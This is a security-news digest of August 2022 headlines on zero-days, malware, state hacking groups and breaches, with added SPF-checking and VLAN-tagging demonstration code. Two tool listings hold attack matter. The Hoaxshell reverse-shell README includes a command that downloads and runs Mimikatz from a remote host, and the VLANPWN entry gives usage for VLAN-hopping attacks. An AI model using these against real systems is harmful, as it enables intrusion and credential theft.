Google Addresses Another Zero-Day Vulnerability In Chrome Browser
Heads up, Chrome users! Google has rolled out another major Chrome browser update fixing a… Google Addresses Another Zero-Day Vulnerability In Chrome Browser on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/18/google-address-another-zero-day-vulnerability-in-chrome-browser/

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities
Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices. The list of issues is below - CVE-2022-32893 - An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content CVE-2022-32894 - An
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

Cybercriminals Developing BugDrop Malware to Bypass Android Security Features
In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a previously undocumented Android dropper trojan that's currently in development. "This new malware tries to abuse devices using a novel technique, not seen before in Android malware, to spread the extremely dangerous Xenomorph banking trojan, allowing criminals
https://thehackernews.com/2022/08/cybercriminals-developing-bugdrop.html

Malicious Browser Extensions Targeted Over a Million Users So Far This Year
More than 1.31 million users attempted to install malicious or unwanted web browser extensions at least once, new findings from cybersecurity firm Kaspersky show. "From January 2020 to June 2022, more than 4.3 million unique users were attacked by adware hiding in browser extensions, which is approximately 70% of all users affected by malicious and unwanted add-ons," the company said. As many as
https://thehackernews.com/2022/08/malicious-browser-extensions-targeted.html

North Korea Hackers Spotted Targeting Job Seekers with macOS Malware
The North Korea-backed Lazarus Group has been observed targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets. Slovak cybersecurity firm ESET linked it to a campaign dubbed "Operation In(ter)ception" that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the aerospace and military sectors into
https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html

Xiaomi Phones with MediaTek Chips Found Vulnerable to Forged Payments
Security flaws have been identified in Xiaomi Redmi Note 9T and Redmi Note 11 models, which could be exploited to disable the mobile payment mechanism and even forge transactions via a rogue Android app installed on the devices. Check Point said it found the flaws in devices powered by MediaTek chipsets during a security analysis of the Chinese handset maker's Trusted Execution Environment (TEE)
https://thehackernews.com/2022/08/xiaomi-phones-with-mediatek-chips-found.html

Apple fixed two new zero-day flaws exploited by threat actors
Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices. Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks. The two flaws are: CVE-2022-32893 – An out-of-bounds issue in WebKit which. An attacker can trigger the […] The post Apple fixed two new zero-day flaws exploited by threat actors appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134527/security/apple-zero-day-flaws-2.html

PoC exploit code for critical Realtek RCE flaw released online
Exploit code for a critical vulnerability affecting networking devices using the Realtek RTL819x system on a chip has been released online. The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek's RTL819x system on a chip was released online. The issue resides in Realtek's SDK for […] The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134515/breaking-news/realtek-rce-poc-exploit.html

Warning!! New Chrome 0-Day Bug Being Exploited In The Wild
Google Chrome released a new security update for Windows, Linux & Mac users, including a fix for a new high-severity zero-day bug that is being actively exploited in the wild by unknown threat actors. Chrome 104 was released with fixes for 11 security vulnerabilities, including one critical-severity bug and six high-severity bugs reported […] The post Warning!! New Chrome 0-Day Bug Being Exploited In The Wild appeared first on GBHackers On Security.
https://gbhackers.com/warning-new-chrome-0-day-bug-being-exploited-in-the-wide/

Malicious Browser Extensions Targeted Over 7 Million Users
In the past two years alone, more than 7 million users have attempted to install malicious browser extensions on their systems. The majority of these extensions are used by threat actors as adware to display advertisements to users. As of 2022, malicious extensions for web browsers were most commonly used by adware […] The post Malicious Browser Extensions Targeted Over 7 Million Users appeared first on GBHackers On Security.
https://gbhackers.com/malicious-browser-extensions/

Yesterday's News

New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild
Google on Tuesday rolled out patches for Chrome browser for desktops to contain an actively exploited high-severity zero-day flaw in the wild. Tracked as CVE-2022-2856, the issue has been described as a case of insufficient validation of untrusted input in Intents. Security researchers Ashley Shen and Christian Resell of Google Threat Analysis Group have been credited with reporting the flaw on
https://thehackernews.com/2022/08/new-google-chrome-zero-day.html

Researchers Link Multi-Year Mass Credential Theft Campaign to Chinese Hackers
A Chinese state-sponsored threat activity group named RedAlpha has been attributed to a multi-year mass credential theft campaign aimed at global humanitarian, think tank, and government organizations. "In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations," Recorded Future disclosed in a new
https://thehackernews.com/2022/08/researchers-link-multi-year-mass.html

Lean Security 101: 3 Tips for Building Your Framework
Cobalt, Lazarus, MageCart, Evil, Revil — cybercrime syndicates spring up so fast it's hard to keep track. Until…they infiltrate your system. But you know what's even more overwhelming than rampant cybercrime? Building your organization's security framework.  CIS, NIST, PCI DSS, HIPAA, HITrust, and the list goes on. Even if you had the resources to implement every relevant industry standard and
https://thehackernews.com/2022/08/lean-security-101-3-tips-for-building.html

RubyGems Makes Multi-Factor Authentication Mandatory for Top Package Maintainers
RubyGems, the official package manager for the Ruby programming language, has become the latest platform to mandate multi-factor authentication (MFA) for popular package maintainers, following in the footsteps of NPM and PyPI. To that end, owners of gems with over 180 million total downloads are mandated to turn on MFA effective August 15, 2022. "Users in this category who do not
https://thehackernews.com/2022/08/rubygems-makes-multi-factor.html

ÆPIC and SQUIP Vulnerabilities Found in Intel and AMD Processors
A group of researchers has revealed details of a new vulnerability affecting Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. Dubbed ÆPIC Leak, the weakness is the first-of-its-kind to architecturally disclose sensitive data in a manner that's akin to an "uninitialized memory read in the CPU itself." "In contrast to transient execution
https://thehackernews.com/2022/08/pic-and-squip-vulnerabilities-found-in.html

Microsoft Warns About Phishing Attacks by Russia-linked Hackers
Microsoft on Monday revealed it took steps to disrupt phishing operations undertaken by a "highly persistent threat actor" whose objectives align closely with Russian state interests. The company is tracking the espionage-oriented activity cluster under its chemical element-themed moniker SEABORGIUM, which it said overlaps with a hacking group also known as Callisto, COLDRIVER, and TA446. "
https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html

Apple security updates fix 2 zero-days used to hack iPhones, Macs
Apple has released emergency security updates today to fix two zero-day vulnerabilities previously exploited by attackers to hack iPhones, iPads, or Macs. [...]
https://www.bleepingcomputer.com/news/security/apple-security-updates-fix-2-zero-days-used-to-hack-iphones-macs/

BlackByte ransomware gang is back with new extortion tactics
The BlackByte ransomware is back with version 2.0 of their operation, including a new data leak site utilizing new extortion techniques borrowed from LockBit. [...]
https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-gang-is-back-with-new-extortion-tactics/

New Windows PowerToys OCR tool will let you copy text from images
Microsoft PowerToys is getting a new utility called PowerOCR that lets you select text in an image and copy it directly to the Windows clipboard. [...]
https://www.bleepingcomputer.com/news/microsoft/new-windows-powertoys-ocr-tool-will-let-you-copy-text-from-images/

North Korean hackers use signed macOS malware to target IT job seekers
North Korean hackers from the Lazarus group have been using a signed malicious executable for macOS to impersonate Coinbase and lure in employees in the financial technology sector. [...]
https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/

Malicious PyPi packages turn Discord into password-stealing malware
A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-stealing backdoor and steals data from web browsers and Roblox. [...]
https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-turn-discord-into-password-stealing-malware/

Malware devs already bypassed Android 13's new security feature
Android malware developers are already adjusting their tactics to bypass a new 'Restricted settings' security feature introduced by Google in the newly released Android 13. [...]
https://www.bleepingcomputer.com/news/security/malware-devs-already-bypassed-android-13s-new-security-feature/

Google fixes fifth Chrome zero-day bug exploited this year
Google has released a security update for Chrome browser that addresses close to a dozen vulnerabilities, including a zero-day flaw that is being exploited in the wild. [...]
https://www.bleepingcomputer.com/news/security/google-fixes-fifth-chrome-zero-day-bug-exploited-this-year/

China-linked RedAlpha behind multi-year credential theft campaign
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor tracked as RedAlpha. The campaign targeted global humanitarian, think tank, and government organizations. Experts believe RedAlpha is a group of contractors conducting cyber-espionage activity on behalf of […] The post China-linked RedAlpha behind multi-year credential theft campaign appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134519/apt/redalpha-china-credential-theft-campaign.html

BugDrop dropper includes features to circumvent Google's security controls
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, that's still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS. The experts noticed something unusual in the […] The post BugDrop dropper includes features to circumvent Google's security controls appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134508/malware/bugdrop-android-malware.html

Google fixed a new Chrome Zero-Day actively exploited in the wild
Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation […] The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134501/security/google-fifth-chrome-zero-day-exploited.html

North Korea-linked APT targets Job Seekers with macOS malware
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […] The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134491/malware/north-korea-mac-malware-m1.html

ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data
Researchers uncovered a new flaw, dubbed ÆPIC, in Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. The ÆPIC Leak (CVE-2022-21233) is the first architectural CPU bug that could lead to the disclosure of sensitive data and impacts most 10th, 11th and 12th generation Intel CPUs. ÆPIC Leak works on […] The post ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134478/security/aepic-leak-architecturally-flaw.html

Zoom fixed two flaws in macOS App that were disclosed at DEF CON
Zoom addressed two high-severity vulnerabilities in its macOS app that were disclosed at the DEF CON conference. Zoom last week released macOS updates to fix two high-severity flaws in its macOS app that were disclosed at the DEF CON conference. Technical details of the vulnerabilities were disclosed at the DEF CON conference by security researcher […] The post Zoom fixed two flaws in macOS App that were disclosed at DEF CON appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134468/security/zoom-macos-app-flaws.html

Swiss Post relaunches e-voting bug bounty program
Ethical hackers invited to stress test election infrastructure
https://portswigger.net/daily-swig/swiss-post-relaunches-e-voting-bug-bounty-program

Developers still struggling with security issues during code reviews, study finds
The road to DevSecOps isn't always the smoothest
https://portswigger.net/daily-swig/developers-still-struggling-with-security-issues-during-code-reviews-study-finds

Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic
hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use: it generates its own PowerShell payload and it supports encryption (ssl). So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http:

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode; it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute successfully and you will have no problem:
> powershell echo 'This is a test'
# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell
# In the same manner, you won't have a problem executing this:
> cmd /c dir /a
# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz through hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell PowerShell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.
http://www.kitploit.com/2022/08/hoaxshell-unconventional-windows.html

Microsoft Disrupted Russia-Linked APT SEABORGIUM Targeting NATO Countries
Microsoft Threat Intelligence Center (MSTIC) has noticed and taken measures to interrupt campaigns launched by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage targeting NATO countries. Insights into SEABORGIUM's Activities: SEABORGIUM has been active since 2017 and is a highly persistent threat actor, repeatedly targeting the same organizations […] The post Microsoft Disrupted Russia-Linked APT SEABORGIUM Targeting NATO Countries appeared first on GBHackers On Security.
https://gbhackers.com/microsoft-disrupted-russia/

SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools|From Scratch To Advanced
SOC Training is one of the most important concerns in order to build a quality Security Operation Center team to fight against advanced threats that target the organization network. Sophisticated detection and prevention technologies are mandatory implementations by security experts since cyber attacks are rising day by day. So implementing dedicated SOC operation and SOC […] The post SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools|From Scratch To Advanced appeared first on GBHackers On Security.
https://gbhackers.com/soc-training-from-scratch/

35 malicious apps found on Google Play Store, installed by 2m users
By Waqas Another day, another set of nasty applications on the official Google Play Store. The growing efforts of cyber-criminals… This is a post from HackRead.com Read the original post: 35 malicious apps found on Google Play Store, installed by 2m users
https://www.hackread.com/35-malicious-apps-google-play-store-millions-installs/

Black Hat USA 2022 and DEF CON 30
Black Hat 2022 USA Briefings wrapped up this past week, along with its sister conference Defcon 30. Coming back from the COVID hiatus, the conferences were enthusiastically full compared to the 2021 ghost town.
https://securelist.com/black-hat-usa-2022-and-def-con-30/107184/

News from Two Days Ago

Ransomware & RDDoS, Why They Are Similar but Different
Both ransomware and distributed denial of service (DDoS) attacks alone have long been a potent… Ransomware & RDDoS, Why They Are Similar but Different on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/16/ransomware-rddos-why-they-are-similar-but-different/

Many Ears from Now: 5 Authentication Modalities that Will Blow Your Mind
Biometrics are evolving: soon it will be possible to identify you by your ear shape… Many Ears from Now: 5 Authentication Modalities that Will Blow Your Mind on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2022/08/16/many-ears-from-now-5-authentication-modalities-that-will-blow-your-mind/

New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks
Cybersecurity researchers have elaborated a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider
https://thehackernews.com/2022/08/new-evil-plc-attack-weaponizes-plcs-to.html

Unified Threat Management: The All-in-One Cybersecurity Solution
UTM (Unified threat management) is thought to be an all-in-one solution for cybersecurity. In general, it is a versatile software or hardware firewall solution integrated with IPS (Intrusion Prevention System) and other security services. A universal gateway allows the user to manage network security with one comprehensive solution, which makes the task much easier. In addition, compared to a
https://thehackernews.com/2022/08/unified-threat-management-all-in-one.html

Russian State Hackers Continue to Attack Ukrainian Entities with Infostealer Malware
Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation. Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked as Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa. The findings have been corroborated
https://thehackernews.com/2022/08/russian-state-hackers-continue-to.html

Nearly 1,900 Signal Messenger Accounts Potentially Compromised in Twilio Hack
Popular end-to-end encrypted messaging service Signal on Monday disclosed the cyberattack aimed at Twilio earlier this month may have exposed the phone numbers of roughly 1,900 users. "For about 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal," the company said. "All users can rest assured that
https://thehackernews.com/2022/08/nearly-1900-signal-messenger-accounts.html

SOVA Android Banking Trojan Returns With New Capabilities and Targets
The SOVA Android banking trojan is continuing to be actively developed with upgraded capabilities to target no less than 200 mobile applications, including banking apps and crypto exchanges and wallets, up from 90 apps when it started out. That's according to the latest findings from Italian cybersecurity firm Cleafy, which found newer versions of the malware sporting functionality to intercept
https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html

Windows KB5012170 update causing BitLocker recovery screens, boot issues
Windows users who have installed a new KB5012170 security update for Secure Boot have encountered various issues, ranging from boots failing with BitLocker Recovery prompts to performance issues. [...]
https://www.bleepingcomputer.com/news/microsoft/windows-kb5012170-update-causing-bitlocker-recovery-screens-boot-issues/

Exploit out for critical Realtek flaw affecting many networking devices
Exploit code has been released for a critical vulnerability affecting networking devices with Realtek's RTL819x system on a chip (SoC), which are estimated to be in the millions. [...]
https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/

RTLS systems vulnerable to MiTM attacks, location manipulation
Security researchers have uncovered multiple vulnerabilities impacting UWB (ultra-wideband) RTLS (real-time locating systems), enabling threat actors to conduct man-in-the-middle attacks and manipulate tag geo-location data. [...]
https://www.bleepingcomputer.com/news/security/rtls-systems-vulnerable-to-mitm-attacks-location-manipulation/

Malicious browser extensions targeted almost 7 million people
Almost 7 million users have attempted to install malicious browser extensions since 2020, with 70% of those extensions used as adware to target users with advertisements. [...]
https://www.bleepingcomputer.com/news/security/malicious-browser-extensions-targeted-almost-7-million-people/

New MailChimp breach exposed DigitalOcean customer email addresses
DigitalOcean is warning customers that a recent MailChimp security breach exposed the email addresses of some customers, with a small number receiving unauthorized password resets. [...]
https://www.bleepingcomputer.com/news/security/new-mailchimp-breach-exposed-digitalocean-customer-email-addresses/

Clop gang targeted UK drinking water supplier South Staffordshire Water
A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach; the company pointed out that the attack did not impact the safety and water distribution systems. South Staffordshire Water plc, known as South Staffs […] The post Clop gang targeted UK drinking water supplier South Staffordshire Water appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134450/cyber-crime/south-staffordshire-water-cyberattack.html

Russia-linked Gamaredon APT continues to target Ukraine
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon […] The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.
https://securityaffairs.co/wordpress/134438/apt/gamaredon-continues-target-ukraine.html

Legitimate hacking activities under UK law proposed by ‘expert consensus’
Contentious edge case activities are no excuse for further delaying of ‘much overdue’ reform, say campaigners
https://portswigger.net/daily-swig/legitimate-hacking-activities-under-uk-law-proposed-by-expert-consensus

Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed enterprise databases
Flaws discovered in various PostgreSQL-as-a-Service offerings, including those from Microsoft and Google
https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases

DEF CON – “don't worry, the elections are safe” edition
Don't worry, elections are safe. Our Security Researcher Cameron Camp provides us with highlights from the DEF CON 30 conference. The post DEF CON – “don't worry, the elections are safe” edition appeared first on WeLiveSecurity
https://www.welivesecurity.com/2022/08/16/def-con-2022-elections-safe-edition/

How a spoofed email passed the SPF check and landed in my inbox
The Sender Policy Framework can't help prevent spam and phishing if you allow billions of IP addresses to send as your domain.
https://www.welivesecurity.com/2022/08/16/spoofed-email-passed-spf-check-inbox/
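The entry above turns on how much address space an SPF record actually authorizes. The following is an added example, not code from the WeLiveSecurity article: it parses an SPF record, counts the IPv4 addresses that pass-qualified ip4 terms admit, and reports what the trailing all qualifier means for every other sender. The domain names and records are constructed for illustration; include, a, mx and similar terms need DNS, so they are only listed, never expanded, which means the real authorized space can only be larger than the number printed.

```python
"""Estimate how permissive an SPF record is (added example, runs offline).

Expands the ip4 terms of an SPF TXT record, counts the IPv4 addresses they
authorize, and reports what the trailing 'all' qualifier means for every other
sender. Terms that need DNS (include, a, mx, redirect, exists, ptr) are listed
but not expanded, so the real authorized space can only be larger.
"""
import ipaddress

# Constructed sample records; these are not real domains' SPF records.
SAMPLE_RECORDS = {
    "tight.example": "v=spf1 ip4:203.0.113.0/24 ip4:198.51.100.7 -all",
    "loose.example": "v=spf1 ip4:0.0.0.0/1 ip4:128.0.0.0/1 ~all",
    "open.example": "v=spf1 include:_spf.example.net +all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
DNS_TERMS = {"include", "a", "mx", "redirect", "exists", "ptr"}


def parse_spf(record):
    """Split an SPF record into (qualifier, name, value) terms and the 'all' qualifier.

    Returns (terms, all_qualifier); all_qualifier is None when no 'all' term is present.
    """
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    terms, all_qualifier = [], None
    for raw in parts[1:]:
        qualifier = "+"                      # RFC 7208: a missing qualifier means '+'
        if raw[0] in QUALIFIERS:
            qualifier, raw = raw[0], raw[1:]
        # modifiers use '=' (redirect=, exp=), mechanisms use ':' (ip4:, include:)
        sep = "=" if "=" in raw and (":" not in raw or raw.index("=") < raw.index(":")) else ":"
        name, _, value = raw.partition(sep)
        name = name.lower()
        if name == "all":
            all_qualifier = qualifier
        else:
            terms.append((qualifier, name, value))
    return terms, all_qualifier


def authorized_ipv4_count(terms):
    """Number of IPv4 addresses explicitly passed by '+ip4' terms (overlaps not merged)."""
    return sum(
        ipaddress.ip_network(value, strict=False).num_addresses
        for qualifier, name, value in terms
        if qualifier == "+" and name == "ip4"
    )


def assess(record, max_addresses=65536):
    """Summarize the record; 'findings' lists what a reviewer should question."""
    terms, all_qualifier = parse_spf(record)
    count = authorized_ipv4_count(terms)
    findings = []
    if all_qualifier == "+":
        findings.append("+all: every host on the internet passes SPF for this domain")
    elif all_qualifier in ("~", "?"):
        findings.append(f"{all_qualifier}all: unlisted senders get {QUALIFIERS[all_qualifier]}, "
                        "which most receivers do not reject on")
    elif all_qualifier is None:
        findings.append("no 'all' term: unlisted senders get neutral (RFC 7208 section 4.7)")
    if count > max_addresses:
        findings.append(f"{count} IPv4 addresses explicitly authorized via ip4 terms")
    return {
        "ipv4_authorized": count,
        "all": all_qualifier,
        "unresolved": [f"{q}{n}:{v}" if v else f"{q}{n}" for q, n, v in terms if n in DNS_TERMS],
        "findings": findings,
    }


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        print(domain, assess(record))
```

The second sample record is the shape the article warns about: two /1 prefixes together cover the whole IPv4 internet, so SPF passes for any sender even though the record never says "+all". The threshold of 65,536 addresses is an assumption chosen for the demo; tune it to the size of your own sending fleet.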

VLANPWN - VLAN Attacks Toolkit
VLAN attacks toolkit.

DoubleTagging.py - Carries out a VLAN hopping (double tagging) attack. It injects a frame carrying two 802.1Q tags; as a result a test ICMP request is also sent into the target VLAN.

DTPHijacking.py - A script for conducting a DTP switch spoofing/hijacking attack. It sends a malicious DTP "Desirable" frame, after which the attacker's port is negotiated into a trunk. The impact is that you can bypass VLAN segmentation and see the traffic of all VLANs carried on that trunk.

Usage:

python3 DoubleTagging.py --help
VLAN Double Tagging inject tool. Jump into another VLAN!
Author: @necreas1ng, <necreas1ng@protonmail.com>
usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER
options:
  -h, --help               show this help message and exit
  --interface INTERFACE    Specify your network interface
  --nativevlan NATIVEVLAN  Specify the Native VLAN ID
  --targetvlan TARGETVLAN  Specify the target VLAN ID for attack
  --victim VICTIM          Specify the target IP
  --attacker ATTACKER      Specify the attacker IP
Example: python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54

python3 DTPHijacking.py --help
DTP Switch Hijacking tool. Become a trunk!
Author: @necreas1ng, <necreas1ng@protonmail.com>
usage: DTPHijacking.py [-h] --interface INTERFACE
options:
  -h, --help               show this help message and exit
  --interface INTERFACE    Specify your network interface
Example: python3 DTPHijacking.py --interface eth0

Download VLANPWN
http://www.kitploit.com/2022/08/vlanpwn-vlan-attacks-toolkit.html
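Why the double-tagging attack above hops VLANs, as an added example that is not part of VLANPWN and sends nothing on the wire: the code builds an Ethernet frame with two stacked 802.1Q tags and emulates the two switch hops. The first switch strips the outer tag because it equals the untagged native VLAN of the trunk; the second switch then honours the inner tag and delivers the frame into the target VLAN. It also shows the usual fix, tagging the native VLAN on the trunk, which leaves the outer tag in place so the frame never reaches the target VLAN. MAC addresses, VLAN IDs and the payload are constructed for the demo.

```python
"""Why double tagging hops VLANs (added example, pure Python, nothing is sent).

Builds an Ethernet frame with two stacked 802.1Q tags and emulates the two
switch hops: the first switch strips the outer tag because it matches the
untagged native VLAN of the trunk, the second switch then honours the inner
tag and delivers the frame into the target VLAN.
"""
import struct

ETHERTYPE_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def mac_bytes(text):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def dot1q_tag(vid, pcp=0):
    """One 802.1Q tag: TPID 0x8100 followed by TCI (3-bit PCP, DEI=0, 12-bit VID)."""
    return struct.pack("!HH", ETHERTYPE_8021Q, (pcp << 13) | (vid & 0x0FFF))


def build_double_tagged(dst, src, outer_vid, inner_vid, payload):
    """Ethernet II frame: dst, src, outer tag (native VLAN), inner tag (target VLAN), IPv4 payload."""
    return (mac_bytes(dst) + mac_bytes(src)
            + dot1q_tag(outer_vid) + dot1q_tag(inner_vid)
            + struct.pack("!H", ETHERTYPE_IPV4) + payload)


def parse_tags(frame):
    """Return (VIDs in outer-to-inner order, payload ethertype, payload)."""
    vids, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == ETHERTYPE_8021Q:
        vids.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4
    return vids, struct.unpack_from("!H", frame, off)[0], frame[off + 2:]


def trunk_egress(frame, native_vid, tag_native=False):
    """Emulate a switch forwarding a frame out of an 802.1Q trunk.

    With the default untagged native VLAN, a frame whose outer VID equals the
    native VLAN leaves the trunk with that tag removed. When the native VLAN
    is tagged on the trunk (tag_native=True) nothing is stripped.
    """
    vids, _, _ = parse_tags(frame)
    if tag_native or not vids or vids[0] != native_vid:
        return frame
    return frame[:12] + frame[16:]          # drop the 4-byte outer tag


def vlan_seen_by_next_switch(frame, native_vid, tag_native=False):
    """VLAN the downstream switch assigns the frame to after the first hop."""
    vids, _, _ = parse_tags(trunk_egress(frame, native_vid, tag_native))
    return vids[0] if vids else native_vid


if __name__ == "__main__":
    # Constructed sample: attacker on native VLAN 1 aims at VLAN 20.
    frame = build_double_tagged("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01", 1, 20,
                                b"\x45" + b"\x00" * 19)
    print("tags on the wire:", parse_tags(frame)[0])
    print("VLAN reached, native untagged:", vlan_seen_by_next_switch(frame, 1))
    print("VLAN reached, native tagged:  ", vlan_seen_by_next_switch(frame, 1, tag_native=True))
```

Two properties of the attack follow directly from the emulation: it only works when the attacker's access VLAN is the trunk's native VLAN, and it is one-way, since the victim's replies carry a single tag for VLAN 20 and are never re-tagged back toward the attacker. Moving the native VLAN to an unused ID or tagging it on the trunk defeats it.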

Twilio Hack: Over 1,900 Signal Users' Phone Numbers Exposed in the Data Breach
Signal, the cross-platform centralized encrypted instant messaging service, says that a data breach at cloud communications company Twilio exposed the phone numbers of almost 1,900 Signal users. Twilio provides phone number verification services for Signal and disclosed on August 4 that attackers had hacked its network. “All users can rest assured that their message history, contact […]
https://gbhackers.com/signal-users-phone-numbers/

Researchers Hacked SpaceX Operated Starlink Satellite Using $25 Modchip
Security researcher Lennert Wouters of the Belgian university KU Leuven successfully hacked the Starlink satellite-based internet system operated by SpaceX. Most striking, the homemade circuit board he built to attack the system cost him only about $25. A series of […]
